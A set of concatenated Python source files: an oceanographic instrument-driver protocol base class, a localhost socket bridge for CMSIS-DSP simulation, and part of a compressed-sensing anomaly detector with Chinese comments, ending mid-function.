def get_direct_access_config(self):
"""
Gets the direct access stored configuration for the instrument.
@retval The dict of parameter_name/values (override this method if it
is more involved for a specific instrument) that should be set at
a higher level.
"""
return self._pre_direct_access_config
def get_direct_config(self):
"""
Gets the port agent's direct access configuration and instrument specific direct access commands.
:return: dictionary
"""
return {'title': self._display_name, 'character_delay': self._character_delay, 'eol': self._newline,
'input_dict': self._direct_commands}
def get_startup_config(self):
"""
Gets the startup configuration for the instrument. The parameters
returned are marked as startup, and the values are the best as chosen
from the initialization, default, and current parameters.
@retval The dict of parameter_name/values (override this method if it
is more involved for a specific instrument) that should be set at
a higher level.
@raise InstrumentProtocolException if a startup parameter doesn't
have a init or default value
"""
return_dict = {}
start_list = self._param_dict.get_keys()
log.trace("Startup list: %s", start_list)
assert isinstance(start_list, list)
for param in start_list:
result = self._param_dict.get_config_value(param)
if result is not None:
return_dict[param] = result
elif self._param_dict.is_startup_param(param):
raise InstrumentProtocolException("Required startup value not specified: %s" % param)
log.debug("Applying startup config: %s", return_dict)
return return_dict
def get_direct_access_params(self):
"""
Get the list of direct access parameters, useful for restoring direct
access configurations up in the driver.
@retval a list of direct access parameter names
"""
return self._param_dict.get_direct_access_list()
def get_cached_config(self):
"""
Return the configuration object that shows the instrument's
configuration as cached in the parameter dictionary...usually in
sync with the instrument, but accessible when offline...
@retval The cached configuration in the instruments config format. By
default, it is a dictionary of parameter names and values.
"""
assert self._param_dict is not None
return self._param_dict.get_all(timestamp=0)
def get_config_metadata_dict(self):
"""
Return a list of metadata about the protocol's driver support,
command formats, and parameter formats. The format should be easily
JSONifyable (as will happen in the driver on the way out to the agent)
@retval A python dict that represents the metadata
@see https://confluence.oceanobservatories.org/display/syseng/
CIAD+MI+SV+Instrument+Driver-Agent+parameter+and+command+metadata+exchange
"""
log.debug("Getting metadata dict from protocol...")
return_dict = {ConfigMetadataKey.DRIVER: self._driver_dict.generate_dict(),
ConfigMetadataKey.COMMANDS: self._cmd_dict.generate_dict(),
ConfigMetadataKey.PARAMETERS: self._param_dict.generate_dict()}
return return_dict
########################################################################
# Command build and response parse handlers.
########################################################################
def _add_response_handler(self, cmd, func, state=None):
"""
Insert a handler class responsible for handling the response to a
command sent to the instrument, optionally available only in a
specific state.
@param cmd The high level key of the command to respond to.
@param func The function that handles the response
@param state The state to pair with the command for which the function
should be used
"""
if state is None:
self._response_handlers[cmd] = func
else:
self._response_handlers[(state, cmd)] = func
def _add_build_handler(self, cmd, func):
"""
Add a command building function.
@param cmd The device command to build.
@param func The function that constructs the command.
"""
self._build_handlers[cmd] = func
########################################################################
# Helpers to build commands.
########################################################################
def _build_simple_command(self, cmd, *args):
"""
Builder for simple commands
@param cmd The command to build
@param args Unused arguments
@retval Returns string ready for sending to instrument
"""
return "%s%s" % (cmd, self._newline)
def _build_keypress_command(self, cmd, *args):
"""
Builder for simple, non-EOLN-terminated commands
@param cmd The command to build
@param args Unused arguments
@retval Returns string ready for sending to instrument
"""
return "%s" % cmd
def _build_multi_keypress_command(self, cmd, *args):
"""
Builder for simple, non-EOLN-terminated commands
@param cmd The command to build
@param args Unused arguments
@retval Returns string ready for sending to instrument
"""
return "%s%s%s%s%s%s" % (cmd, cmd, cmd, cmd, cmd, cmd)
########################################################################
# Static helpers to format set commands.
########################################################################
@staticmethod
def _true_false_to_string(v):
"""
Write a boolean value to string formatted for "generic" set operations.
Subclasses should overload this as needed for instrument-specific
formatting.
@param v a boolean value.
@retval A yes/no string formatted as a Python boolean for set operations.
@throws InstrumentParameterException if value not a bool.
"""
if not isinstance(v, bool):
raise InstrumentParameterException('Value %s is not a bool.' % str(v))
return str(v)
@staticmethod
def _int_to_string(v):
"""
Write an int value to string formatted for "generic" set operations.
Subclasses should overload this as needed for instrument-specific
formatting.
@param v An int val.
@retval an int string formatted for generic set operations.
@throws InstrumentParameterException if value not an int.
"""
if not isinstance(v, int):
raise InstrumentParameterException('Value %s is not an int.' % str(v))
else:
return '%i' % v
@staticmethod
def _float_to_string(v):
"""
Write a float value to string formatted for "generic" set operations.
Subclasses should overload this as needed for instrument-specific
formatting.
@param v A float val.
@retval a float string formatted for "generic" set operations.
@throws InstrumentParameterException if value is not a float.
"""
if not isinstance(v, float):
raise InstrumentParameterException('Value %s is not a float.' % v)
else:
return '%e' % v
def _get_param_list(self, *args, **kwargs):
"""
returns a list of parameters based on the list passed in. If the
list contains and ALL parameters request then the list will contain
all parameters. Otherwise the original list will be returned. Also
check the list for unknown parameters
@param args[0] list of parameters to inspect
@return: list of parameters.
@raises: InstrumentParameterException when the wrong param type is passed
in or an unknown parameter is in the list
"""
try:
param_list = args[0]
except IndexError:
raise InstrumentParameterException('Parameter required, none specified')
if isinstance(param_list, basestring):
param_list = [param_list]
elif not isinstance(param_list, (list, tuple)):
raise InstrumentParameterException("Expected a list, tuple or a string")
# Verify all parameters are known parameters
bad_params = []
known_params = self._param_dict.get_keys() + [DriverParameter.ALL]
for param in param_list:
if param not in known_params:
bad_params.append(param)
if len(bad_params):
raise InstrumentParameterException("Unknown parameters: %s" % bad_params)
if DriverParameter.ALL in param_list:
return self._param_dict.get_keys()
else:
return param_list
def shutdown(self):
if self._scheduler:
self._scheduler.shutdown()
self._scheduler = None
class CommandResponseInstrumentProtocol(InstrumentProtocol):
"""
Base class for text-based command-response instruments.
"""
def __init__(self, prompts, newline, driver_event):
"""
Constructor.
@param prompts Enum class containing possible device prompts used for
command response logic.
@param newline The device newline.
@driver_event The callback for asynchronous driver events.
"""
# Construct superclass.
InstrumentProtocol.__init__(self, driver_event)
# The end of line delimiter.
self._newline = newline
# Class of prompts used by device.
self._prompts = prompts
# Line buffer for input from device.
self._linebuf = ''
# Short buffer to look for prompts from device in command-response
# mode.
self._promptbuf = ''
# Lines of data awaiting further processing.
self._datalines = []
# Handlers to build commands.
self._build_handlers = {}
# Handlers to parse responses.
self._response_handlers = {}
self._last_data_timestamp = 0
def _get_prompts(self):
"""
Return a list of prompts order from longest to shortest. The
assumption is the longer is more specific.
@return: list of prompts orders by length.
"""
if isinstance(self._prompts, list):
prompts = self._prompts
else:
prompts = self._prompts.list()
prompts.sort(lambda x, y: cmp(len(y), len(x)))
return prompts
def _get_response(self, timeout=10, expected_prompt=None, response_regex=None):
"""
Get a response from the instrument, but be a bit loose with what we
find. Leave some room for white space around prompts and not try to
match that just in case we are off by a little whitespace or not quite
at the end of a line.
@todo Consider cases with no prompt
@param timeout The timeout in seconds
@param expected_prompt Only consider the specific expected prompt as
presented by this string
@param response_regex Look for a response value that matches the
supplied compiled regex pattern. Groups that match will be returned as a
string. Cannot be used with expected prompt. None
will be returned as a prompt with this match. If a regex is supplied,
internal the prompt list will be ignored.
@retval Regex search result tuple (as MatchObject.groups() would return
if a response_regex is supplied. A tuple of (prompt, response) if a
prompt is looked for.
@throw InstrumentProtocolException if both regex and expected prompt are
passed in or regex is not a compiled pattern.
@throw InstrumentTimeoutException on timeout
"""
# Grab time for timeout and wait for prompt.
starttime = time.time()
if response_regex and not isinstance(response_regex, RE_PATTERN):
raise InstrumentProtocolException('Response regex is not a compiled pattern!')
if expected_prompt and response_regex:
raise InstrumentProtocolException('Cannot supply both regex and expected prompt!')
if expected_prompt is None:
prompt_list = self._get_prompts()
else:
if isinstance(expected_prompt, basestring):
prompt_list = [expected_prompt]
else:
prompt_list = expected_prompt
if response_regex is None:
pattern = None
else:
pattern = response_regex.pattern
log.debug('_get_response: timeout=%s, prompt_list=%s, expected_prompt=%r, response_regex=%r, promptbuf=%r',
timeout, prompt_list, expected_prompt, pattern, self._promptbuf)
while True:
if response_regex:
match = response_regex.search(self._linebuf)
if match:
return match.groups()
else:
for item in prompt_list:
index = self._promptbuf.find(item)
if index >= 0:
result = self._promptbuf[0:index + len(item)]
return item, result
time.sleep(.1)
if time.time() > starttime + timeout:
raise InstrumentTimeoutException("in InstrumentProtocol._get_response()")
def _get_raw_response(self, timeout=10, expected_prompt=None):
"""
Get a response from the instrument, but don't trim whitespace. Used in
times when the whitespace is what we are looking for.
@param timeout The timeout in seconds
@param expected_prompt Only consider the specific expected prompt as
presented by this string
@throw InstrumentProtocolException on timeout
"""
# Grab time for timeout and wait for prompt.
strip_chars = "\t "
starttime = time.time()
if expected_prompt is None:
prompt_list = self._get_prompts()
else:
if isinstance(expected_prompt, basestring):
prompt_list = [expected_prompt]
else:
prompt_list = expected_prompt
while True:
for item in prompt_list:
if self._promptbuf.rstrip(strip_chars).endswith(item.rstrip(strip_chars)):
return item, self._linebuf
else:
time.sleep(.1)
if time.time() > starttime + timeout:
raise InstrumentTimeoutException("in InstrumentProtocol._get_raw_response()")
def _do_cmd_resp(self, cmd, *args, **kwargs):
"""
Perform a command-response on the device.
@param cmd The command to execute.
@param args positional arguments to pass to the build handler.
@param write_delay kwarg for the amount of delay in seconds to pause
between each character. If none supplied, the DEFAULT_WRITE_DELAY
value will be used.
@param timeout optional wakeup and command timeout via kwargs.
@param expected_prompt kwarg offering a specific prompt to look for
other than the ones in the protocol class itself.
@param response_regex kwarg with a compiled regex for the response to
match. Groups that match will be returned as a string.
Cannot be supplied with expected_prompt. May be helpful for
instruments that do not have a prompt.
@retval resp_result The (possibly parsed) response result including the
first instance of the prompt matched. If a regex was used, the prompt
will be an empty string and the response will be the joined collection
of matched groups.
@raises InstrumentTimeoutException if the response did not occur in time.
@raises InstrumentProtocolException if command could not be built or if response
was not recognized.
"""
# Get timeout and initialize response.
timeout = kwargs.get('timeout', DEFAULT_CMD_TIMEOUT)
expected_prompt = kwargs.get('expected_prompt', None)
response_regex = kwargs.get('response_regex', None)
write_delay = kwargs.get('write_delay', DEFAULT_WRITE_DELAY)
if response_regex and not isinstance(response_regex, RE_PATTERN):
raise InstrumentProtocolException('Response regex is not a compiled pattern!')
if expected_prompt and response_regex:
raise InstrumentProtocolException('Cannot supply both regex and expected prompt!')
# Get the build handler.
build_handler = self._build_handlers.get(cmd, None)
if not build_handler:
raise InstrumentProtocolException('Cannot build command: %s' % cmd)
if not callable(build_handler):
raise InstrumentProtocolException('Build handler is not callable')
cmd_line = build_handler(cmd, *args)
# Wakeup the device, pass up exception if timeout
self._wakeup(timeout)
# Clear line and prompt buffers for result.
self._linebuf = ''
self._promptbuf = ''
# Send command.
log.debug('_do_cmd_resp: %r, timeout=%s, write_delay=%s, expected_prompt=%r, response_regex=%r',
cmd_line, timeout, write_delay, expected_prompt, response_regex)
if write_delay == 0:
self._connection.send(cmd_line)
else:
for char in cmd_line:
self._connection.send(char)
time.sleep(write_delay)
# Wait for the prompt, prepare result and return, timeout exception
if response_regex:
prompt = ""
result_tuple = self._get_response(timeout,
response_regex=response_regex,
expected_prompt=expected_prompt)
result = "".join(result_tuple)
else:
(prompt, result) = self._get_response(timeout,
expected_prompt=expected_prompt)
resp_handler = (self._response_handlers.get((self.get_current_state(), cmd), None) or
self._response_handlers.get(cmd, None))
if callable(resp_handler):
return resp_handler(result, prompt)
return None
def _do_cmd_no_resp(self, cmd, *args, **kwargs):
"""
Issue a command to the instrument after a wake up and clearing of
buffers. No response is handled as a result of the command.
@param cmd The command to execute.
@param args positional arguments to pass to the build handler.
@param timeout=timeout optional wakeup timeout.
@raises InstrumentTimeoutException if the response did not occur in time.
@raises InstrumentProtocolException if command could not be built.
"""
timeout = kwargs.get('timeout', DEFAULT_CMD_TIMEOUT)
write_delay = kwargs.get('write_delay', DEFAULT_WRITE_DELAY)
build_handler = self._build_handlers.get(cmd, None)
if not callable(build_handler):
log.error('_do_cmd_no_resp: no handler for command: %s', cmd)
raise InstrumentProtocolException(error_code=InstErrorCode.BAD_DRIVER_COMMAND)
cmd_line = build_handler(cmd, *args)
# Wakeup the device, timeout exception as needed
self._wakeup(timeout)
# Clear line and prompt buffers for result.
self._linebuf = ''
self._promptbuf = ''
# Send command.
log.debug('_do_cmd_no_resp: %r, timeout=%s', cmd_line, timeout)
if write_delay == 0:
self._connection.send(cmd_line)
else:
for char in cmd_line:
self._connection.send(char)
time.sleep(write_delay)
def _do_cmd_direct(self, cmd):
"""
Issue an untranslated command to the instrument. No response is handled
as a result of the command.
@param cmd The high level command to issue
"""
# Send command.
log.debug('_do_cmd_direct: %r', cmd)
self._connection.send(cmd)
########################################################################
# Incoming data (for parsing) callback.
########################################################################
def got_data(self, port_agent_packet):
"""
Called by the instrument connection when data is available.
Append line and prompt buffers.
Also add data to the chunker and when received call got_chunk to publish results.
:param port_agent_packet: raw data from instrument
"""
data_length = port_agent_packet.get_data_length()
data = port_agent_packet.get_data()
timestamp = port_agent_packet.get_timestamp()
log.debug("Got Data: %r", data)
log.debug("Add Port Agent Timestamp: %s", timestamp)
if data_length > 0:
if self.get_current_state() == DriverProtocolState.DIRECT_ACCESS:
self._driver_event(DriverAsyncEvent.DIRECT_ACCESS, data)
self.add_to_buffer(data)
self._chunker.add_chunk(data, timestamp)
(timestamp, chunk) = self._chunker.get_next_data()
while chunk:
self._got_chunk(chunk, timestamp)
(timestamp, chunk) = self._chunker.get_next_data()
########################################################################
# Incoming raw data callback.
########################################################################
def got_raw(self, port_agent_packet):
"""
Called by the port agent client when raw data is available, such as data
sent by the driver to the instrument, the instrument responses,etc.
:param port_agent_packet: raw data from instrument
"""
self.publish_raw(port_agent_packet)
def publish_raw(self, port_agent_packet):
"""
Publish raw data
:param port_agent_packet: raw data from instrument
"""
particle = RawDataParticle(port_agent_packet.get_as_dict(),
port_timestamp=port_agent_packet.get_timestamp())
if self._driver_event:
self._driver_event(DriverAsyncEvent.SAMPLE, particle.generate())
def wait_for_particles(self, particle_classes, timeout=0):
"""
Wait for a set of particles to get generated within the specified timeout.
Return a list of particles
@param particle_classes: a list of data particle classes
@param timeout: timeout for particle generation
"""
# Ensure that particle_classes is a list
if not isinstance(particle_classes, (list, tuple)):
particle_classes = [particle_classes]
# Make a copy of the list before mutating it
particle_classes = particle_classes[:]
particles = []
while True:
for particle_class in particle_classes[:]:
if particle_class in self._particle_dict:
log.debug("Particle found for %s" % particle_class)
particle = self._particle_dict.pop(particle_class)
particle_classes.remove(particle_class)
particles.append(particle)
if not particle_classes:
return particles
if time.time() > timeout:
break
time.sleep(0.1)
log.debug("Timeout expired - unable to find all requested particles.")
return particles
def add_to_buffer(self, data):
"""
Add a chunk of data to the internal data buffers
buffers implemented as lifo ring buffer
@param data: bytes to add to the buffer
"""
# Update the line and prompt buffers.
# If our buffer exceeds the max allowable size then drop the leading
# characters on the floor.
maxbuf = self._max_buffer_size()
self._linebuf = (self._linebuf + data)[-maxbuf:]
self._promptbuf = (self._promptbuf + data)[-maxbuf:]
self._last_data_timestamp = time.time()
def _max_buffer_size(self):
return MAX_BUFFER_SIZE
########################################################################
# Wakeup helpers.
########################################################################
def _send_wakeup(self):
"""
Send a wakeup to the device. Overridden by device specific
subclasses.
"""
pass
def _wakeup(self, timeout, delay=1):
"""
Clear buffers and send a wakeup command to the instrument
@param timeout The timeout to wake the device.
@param delay The time to wait between consecutive wakeups.
@throw InstrumentTimeoutException if the device could not be woken.
"""
# Clear the prompt buffer.
log.trace("clearing promptbuf: %r", self._promptbuf)
self._promptbuf = ''
# Grab time for timeout.
starttime = time.time()
while True:
# Send a line return and wait a sec.
log.trace('Sending wakeup. timeout=%s', timeout)
self._send_wakeup()
time.sleep(delay)
log.trace("Prompts: %s", self._get_prompts())
for item in self._get_prompts():
log.trace("buffer: %r", self._promptbuf)
log.trace("find prompt: %r", item)
index = self._promptbuf.find(item)
log.trace("Got prompt (index: %s): %r ", index, self._promptbuf)
if index >= 0:
log.trace('wakeup got prompt: %r', item)
return item
log.trace("Searched for all prompts")
if time.time() > starttime + timeout:
raise InstrumentTimeoutException("in _wakeup()")
def _wakeup_until(self, timeout, desired_prompt, delay=1, no_tries=5):
"""
Continue waking device until a specific prompt appears or a number
of tries has occurred. Desired prompt must be in the instrument's
prompt list.
@param timeout The timeout to wake the device.
@desired_prompt Continue waking until this prompt is seen.
@delay Time to wake between consecutive wakeups.
@no_tries Maximum number of wakeup tries to see desired prompt.
@raises InstrumentTimeoutException if device could not be woken.
@raises InstrumentProtocolException if the desired prompt is not seen in the
maximum number of attempts.
"""
count = 0
while True:
prompt = self._wakeup(timeout, delay)
if prompt == desired_prompt:
break
else:
time.sleep(delay)
count += 1
if count >= no_tries:
raise InstrumentProtocolException('Incorrect prompt.')
class MenuInstrumentProtocol(CommandResponseInstrumentProtocol):
"""
Base class for menu-based instrument interfaces that can use a cmd/response approach to
walking down the menu from its root.
"""
class MenuTree(object):
# The _node_directions variable is a dictionary of menu sub-menus keyed by the sub-menu's name.
# Each sub-menu entry contains a list of directions, which are either cmd/response pairs or
# sub_menu names. These commands need to be executed in the specified order to get from the root menu
# to the sub-menu.
# example:
#
# for these enumerations:
#
# class SubMenues(BaseEnum):
# SUB_MENU1 = 'sub_menu1'
# SUB_MENU2 = 'sub_menu2'
# SUB_MENU3 = 'sub_menu3'
# SUB_MENU4 = 'sub_menu4'
#
# class InstrumentPrompts(BaseEnum):
# MAIN_MENU = '\a\b ? \a\b'
# SUB_MENU1 = '\a\b 1'
# SUB_MENU2 = '\a\b 2'
# SUB_MENU3 = '\a\b 3'
# SUB_MENU4 = '\a\b 4'
#
# the instance creation could look like:
#
# Directions = MenuInstrumentProtocol.MenuTree.Directions
#
# menu = MenuInstrumentProtocol.MenuTree({
# SubMenues.SUB_MENU1 : [Directions("1", InstrumentPrompts.SUB_MENU1)],
# SubMenues.SUB_MENU2 : [Directions("2", InstrumentPrompts.SUB_MENU2)],
# SubMenues.SUB_MENU3 : [Directions(SubMenues.SUB_MENU2),
# Directions("2", InstrumentPrompts.SUB_MENU3, 20)],
# SubMenues.SUB_MENU4 : [Directions(SubMenues.SUB_MENU3),
# Directions("d", InstrumentPrompts.SUB_MENU4)]
# })
#
# After passing the menu into the constructor via:
# MenuInstrumentProtocol.__init__(self, menu, prompts, newline, driver_event)
#
# directions can be retrieved for a sub-menu using:
#
# directions_list = self._menu.get_directions(SubMenues.SUB_MENU4)
#
# which should return a list of Directions objects which can be used to walk from
# the root menu to the sub-menu as follows:
#
# for directions in directions_list:
# command = directions.get_command()
# response = directions.get_response()
# timeout = directions.get_timeout()
# do_cmd_reponse(command, expected_prompt = response, timeout = timeout)
class Directions(object):
def __init__(self, command=None, response=None, timeout=10):
if command is None:
raise InstrumentProtocolException('MenuTree.Directions(): command parameter missing')
self.command = command
self.response = response
self.timeout = timeout
def __str__(self):
return "command=%r, response=%r, timeout=%r" % (self.command, self.response, self.timeout)
def get_command(self):
return self.command
def get_response(self):
return self.response
def get_timeout(self):
return self.timeout
_node_directions = {}
def __init__(self, node_directions):
if not isinstance(node_directions, dict):
raise InstrumentProtocolException('MenuTree.__init__(): node_directions parameter not a dictionary')
self._node_directions = node_directions
def get_directions(self, node):
try:
directions_list = self._node_directions[node]
except:
raise InstrumentProtocolException(
'MenuTree.get_directions(): node %s not in _node_directions dictionary'
% str(node))
log.trace("MenuTree.get_directions(): _node_directions = %s, node = %s, d_list = %s",
self._node_directions, node, directions_list)
directions = []
for item in directions_list:
if not isinstance(item, self.Directions):
raise InstrumentProtocolException(
'MenuTree.get_directions(): item %s in directions list not a Directions object'
% str(item))
if item.response is not None:
directions.append(item)
else:
directions += self.get_directions(item.command)
return directions
def __init__(self, menu, prompts, newline, driver_event, **kwargs):
"""
Constructor.
@param prompts Enum class containing possible device prompts used for
menu system.
@param newline The device newline.
@param driver_event The callback for asynchronous driver events.
@param read_delay optional kwarg specifying amount of time to delay before
attempting to read response from instrument (in _get_response).
"""
# Construct superclass.
CommandResponseInstrumentProtocol.__init__(self, prompts, newline, driver_event)
self._menu = menu
# The end of line delimiter.
self._newline = newline
# Class of prompts used by device.
self._prompts = prompts
# Linebuffer for input from device.
self._linebuf = ''
# Short buffer to look for prompts from device in command-response
# mode.
self._promptbuf = ''
# Lines of data awaiting further processing.
self._datalines = []
# Handlers to build commands.
self._build_handlers = {}
# Handlers to parse responses.
self._response_handlers = {}
self._last_data_timestamp = 0
# Initialize read_delay
self._read_delay = kwargs.get('read_delay', None)
def _get_response(self, timeout=10, expected_prompt=None, **kwargs):
"""
Get a response from the instrument
@todo Consider cases with no prompt
@param timeout The timeout in seconds
@param expected_prompt Only consider the specific expected prompt as
presented by this string
@throw InstrumentProtocolExecption on timeout
"""
# Because the output of the instrument does not generate events, do_cmd_resp
# jumps right in here looking for a response, and often it is before the
# complete response has arrived, so we can miss it. The read delay
# is to alleviate that problem.
if self._read_delay is not None:
time.sleep(self._read_delay)
return CommandResponseInstrumentProtocol._get_response(self,
timeout=timeout,
expected_prompt=expected_prompt)
def _navigate(self, menu, **kwargs):
"""
Navigate to the given sub menu and then do nothing
@param menu The enum for the menu to navigate to.
@retval A tuple of result and parameter of the last menu encountered
@throw InstrumentProtocolException When the destination cannot be reached.
"""
# Get dest_submenu arg
if menu is None:
raise InstrumentProtocolException('Menu parameter missing')
result = (None, None) # base case in case of empty directions list
# iterate through the directions
directions_list = self._menu.get_directions(menu)
for directions in directions_list:
log.debug('_navigate: directions: %s', directions)
command = directions.get_command()
response = directions.get_response()
timeout = directions.get_timeout()
result = self._do_cmd_resp(command, expected_prompt=response,
timeout=timeout, **kwargs)
return result
def _navigate_and_execute(self, cmd, expected_prompt=None, **kwargs):
"""
Navigate to a sub-menu and execute a command.
@param cmd The command to execute.
@param expected_prompt optional kwarg passed through to do_cmd_resp.
@param timeout=timeout optional wakeup and command timeout.
@param write_delay optional kwarg passed through to do_cmd_resp.
@throws InstrumentTimeoutException if the response did not occur in time.
@throws InstrumentProtocolException if command could not be built or if response
was not recognized.
"""
self._navigate(kwargs['dest_submenu'], expected_prompt, **kwargs)
self._do_cmd_resp(cmd, expected_prompt=expected_prompt, **kwargs)
"""
DHE: this is a kludge; need a way to send a parameter as a "command." We can't expect to look
up all possible values in the build_handlers
"""
value = kwargs.pop('value', None)
if cmd is None:
cmd_line = self._build_simple_command(value)
log.debug('_navigate_and_execute: sending value: %r to connection.send.', cmd_line)
self._connection.send(cmd_line)
return None
else:
log.debug('_navigate_and_execute: sending cmd: %r with kwargs: %r to _do_cmd_resp.', cmd, kwargs)
return self._do_cmd_resp(cmd, **kwargs)
def _go_to_root_menu(self):
"""
This method needs to be implemented for each instrument. It performs the commands that
returns the instrument to its root menu
"""
raise NotImplementedException('_go_to_root_menu() not implemented.')
def got_data(self, data):
"""
Called by the instrument connection when data is available.
Append line and prompt buffers. Extended by device specific
subclasses.
:param data: data to process
"""
CommandResponseInstrumentProtocol.got_data(self, data)
|
VHT.py
|
from multiprocessing import Process,Semaphore
import multiprocessing as mp
import socket
import cmsisdsp.sdf.nodes.host.message as msg
HOST = '127.0.0.1' # The remote host
PORT = 50007
class ModelicaConnectionLost(Exception):
pass
def connectToServer(inputMode,theid):
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# Identify as vht input
if inputMode:
print("Connecting as INPUT")
theBytes=msg.list_to_bytes(msg.clientID(msg.VSIINPUT,theid))
else:
print("Connecting as OUTPUT")
theBytes=msg.list_to_bytes(msg.clientID(msg.VSIOUTPUT,theid))
#print("vs0: %d %d" % (int(theBytes[0]),int(theBytes[1])))
msg.sendBytes(s,theBytes)
return(s)
def source(theid,size,queue,started):
s=connectToServer(True,theid)
started.release()
try:
while True:
received=msg.receiveBytes(s,size)
queue.put(received)
except Exception as inst:
print(inst)
finally:
queue.close()
def sink(theid,size,queue,started):
s=connectToServer(False,theid)
data= bytes(size)
msg.sendBytes(s,data)
started.release()
try:
while True:
tosend=queue.get(True,2)
msg.sendBytes(s,tosend)
except Exception as inst:
print(inst)
finally:
queue.close()
class Source:
def __init__(self,theid,bufferSize):
self._bufferSize_ = bufferSize
self._srcQueue_ = mp.Queue()
self._started_ = Semaphore()
# Q15 data is sent so a *2 factor for bufferSize since
# source function is working with bytes
self._src_ = Process(target=source, args=(theid,2*bufferSize,self._srcQueue_,self._started_))
self._src_.start()
@property
def queue(self):
return(self._srcQueue_)
def get(self):
if self._src_.exitcode is None:
return(msg.bytes_to_list(self.queue.get(True,2)))
else:
raise ModelicaConnectionLost
def end(self):
self._src_.terminate()
def wait(self):
self._started_.acquire()
class Sink:
def __init__(self,theid,bufferSize):
self._bufferSize_ = bufferSize
self._sinkQueue_ = mp.Queue()
self._started_ = Semaphore()
# Q15 data is sent so a *2 factor for bufferSize since
# sink function is working with bytes
self._sink_ = Process(target=sink, args=(theid,2*bufferSize,self._sinkQueue_,self._started_))
self._sink_.start()
@property
def queue(self):
return(self._sinkQueue_)
def put(self,data):
if self._sink_.exitcode is None:
q15list=[int(x) for x in data]
self.queue.put(msg.list_to_bytes(q15list),True,1)
else:
raise ModelicaConnectionLost
def end(self):
self._sink_.terminate()
def wait(self):
self._started_.acquire()
|
cs_anomaly_detector.py
|
import numpy as np
import os
from algorithm.cluster import cluster
from algorithm.cvxpy import reconstruct
from algorithm.sampling import localized_sample
from cvxpy.error import SolverError
from multiprocessing import Process, Event, Queue
from threading import Thread
max_seed = 10 ** 9 + 7
class CycleFeatureProcess(Process):
"""
计算单个周期内特征的线程
"""
def __init__(
self,
task_queue: Queue,
result_queue: Queue,
cluster_threshold: float
):
"""
:param task_queue: 作业队列
:param result_queue: 结果队列
:param cluster_threshold: 聚类阈值
"""
super().__init__()
self.task_queue = task_queue
self.result_queue = result_queue
self.cluster_threshold = cluster_threshold
def run(self):
print('CycleFeatureProcess-%d: start' % os.getpid())
while not self.task_queue.empty():
group_index, cycle_data = self.task_queue.get()
self.result_queue.put(
(group_index, cluster(cycle_data, self.cluster_threshold))
)
print(
'CycleFeatureProcess-%d: finish task-%d' %
(os.getpid(), group_index)
)
print('CycleFeatureProcess-%d: exit' % os.getpid())
class WindowReconstructProcess(Process):
"""
窗口重建工作进程
"""
def __init__(
self,
data: np.array,
task_queue: Queue,
result_queue: Queue,
cycle: int,
latest_windows: int,
sample_score_method,
sample_rate: float,
scale: float,
rho: float,
sigma: float,
random_state: int,
without_localize_sampling: bool,
retry_limit: int,
task_return_event: Event()
):
"""
:param data: 原始数据的拷贝
:param task_queue: 作业队列
:param result_queue: 结果队列
:param cycle: 周期
:param latest_windows: 计算采样价值指标时参考的最近历史周期数
:param sample_score_method: 计算采样价值指标方法
:param sample_rate: 采样率
:param scale: 采样参数: 等距采样点扩充倍数
:param rho: 采样参数: 中心采样概率
:param sigma: 采样参数: 采样集中程度
:param random_state: 随机数种子
:param without_localize_sampling: 是否不按局部化采样算法进行采样
:param retry_limit: 每个窗口重试的上限
:param task_return_event: 当一个作业被完成时触发的事件, 通知主进程收集
"""
super().__init__()
self.data = data
self.task_queue = task_queue
self.result_queue = result_queue
self.cycle = cycle
self.latest_windows = latest_windows
self.sample_score_method = sample_score_method
self.sample_rate = sample_rate
self.without_localize_sampling = without_localize_sampling
self.scale = scale
self.rho = rho
self.sigma = sigma
self.random_state = random_state
self.retry_limit = retry_limit
self.task_return_event = task_return_event
def run(self):
from time import time
if self.random_state:
np.random.seed(self.random_state)
tot = time()
data_process = 0
wait_syn = 0
rec = 0
sample_scoring = 0
print('WindowReconstructProcess-%d: start' % os.getpid())
while not self.task_queue.empty():
t = time()
wb, we, group = self.task_queue.get()
wait_syn += time() - t
t = time()
hb = max(0, wb - self.latest_windows)
latest = self.data[hb:wb]
window_data = self.data[wb:we]
data_process += time() - t
t = time()
sample_score = self.sample_score_method(window_data, latest)
sample_scoring += time() - t
t = time()
rec_window, retries = \
self.window_sample_reconstruct(
data=window_data,
groups=group,
score=sample_score,
random_state=self.random_state * wb * we % max_seed
)
rec += time() - t
t = time()
self.result_queue.put((wb, we, rec_window, retries, sample_score))
self.task_return_event.set()
wait_syn += time() - t
print(
'WindowReconstructProcess-%d: window[%d, %d) done' %
(os.getpid(), wb, we)
)
tot = time() - tot
print('WindowReconstructProcess-%d: exit' % os.getpid())
print(
'tot: %f\ndata_process: %f\nwait_syn: %f\nrec: %f\n'
'sample_scoring:%f\n'
% (tot, data_process, wait_syn, rec, sample_scoring)
)
def sample(self, x: np.array, m: int, score: np.array, random_state: int):
"""
取得采样的数据
:param x: kpi等距时间序列, shape=(n,d), n是行数, d是维度
:param m: 采样个数
:param score: 采样点置信度
:param random_state: 采样随机种子
:return: 采样序列数组X, X[i][0]是0~n-1的实数, 表示该采样点的时间点,
X[i][1] 是shape=(k,)的数组, 表示该时间点各个维度kpi数据 0<i<m
已经按X[i][0]升序排序
"""
n, d = x.shape
data_mat = np.mat(x)
sample_matrix, timestamp = localized_sample(
x=data_mat, m=m,
score=score,
scale=self.scale, rho=self.rho, sigma=self.sigma,
random_state=random_state
)
# 采样中心对应的位置
s = np.array(sample_matrix * data_mat)
res = []
for i in range(m):
res.append((timestamp[i], s[i]))
res.sort(key=lambda each: each[0])
res = np.array(res)
timestamp = np.array(res[:, 0]).astype(int)
values = np.zeros((m, d))
for i in range(m):
values[i, :] = res[i][1]
return timestamp, values
def window_sample_reconstruct(
self,
data: np.array,
groups: list,
score: np.array,
random_state: int
):
"""
:param data: 原始数据
:param groups: 分组
:param score: 这个窗口的每一个点的采样可信度
:param random_state: 随机种子
:return: 重建数据, 重建尝试次数
"""
# 数据量, 维度
n, d = data.shape
retry_count = 0
sample_rate = self.sample_rate
while True:
try:
if self.without_localize_sampling:
if random_state:
np.random.seed(random_state)
timestamp = np.random.choice(
np.arange(n),
size=int(np.round(sample_rate * n)),
replace=False
)
values = data[timestamp]
else:
timestamp, values = \
self.sample(
data,
int(np.round(sample_rate * n)),
score,
random_state
)
rec = np.zeros(shape=(n, d))
for i in range(len(groups)):
x_re = reconstruct(
n, len(groups[i]), timestamp,
values[:, groups[i]]
)
for j in range(len(groups[i])):
rec[:, groups[i][j]] = x_re[:, j]
break
except SolverError:
if retry_count > self.retry_limit:
